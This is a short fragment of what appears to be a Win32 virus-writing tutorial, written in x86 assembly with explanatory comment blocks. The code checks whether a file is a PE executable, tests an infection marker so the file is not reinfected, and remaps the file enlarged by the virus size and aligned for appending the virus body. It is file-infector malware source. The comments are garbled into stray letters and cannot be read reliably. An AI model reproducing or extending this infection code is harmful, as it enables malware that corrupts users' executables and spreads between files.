Win32


- 9


mov esi,[eax+3Ch] add esi,eax cmp dword ptr [esi],"EP" ; PE? jnz NoInfect

cmp dword ptr [esi+4Ch],"CTZA" ; p ? jz NoInfect

push dword ptr [esi+3Ch]

push dword ptr [ebp+MapAddress] ; p call [ebp+_UnmapViewOfFile]

push dword ptr [ebp+MapHandle] call [ebp+_CloseHandle]

pop ecx

;-------------------------------------; ; p EAX. PE- ; ; (MapAddress+3Ch), p , p, ; ; p PE- ESI. p ; ; pp, p , p, ; ; p p ( p p PE ; ; 4Ch, pp), p ; ; p (File Alignement) (p p ; ; PE). p p ; ; p , p pp ECX. ; ;-------------------------------------;

mov eax,dword ptr [ebp+WFD_nFileSizeLow] ; add eax,virus_size

call Align xchg ecx,eax

call CreateMap or eax,eax jz CloseFile

mov dword ptr [ebp+MapHandle],eax

mov ecx,dword ptr [ebp+NewSize] call MapFile

or eax,eax jz UnMapFile

mov dword ptr [ebp+MapAddress],eax

mov esi,[eax+3Ch] add esi,eax

;-------------------------------------; ; H ECX p ; ; Align, p p, pp EAX ; ; pp p pp p. p ; ; p pp . Hpp, p p 200h, ; ; pp + pp p - 1234h, 'Align' p ; ; 12400h. ECX. ; ; CreateMap, p p p pp. ; ; ESI PE ; ;-------------------------------------;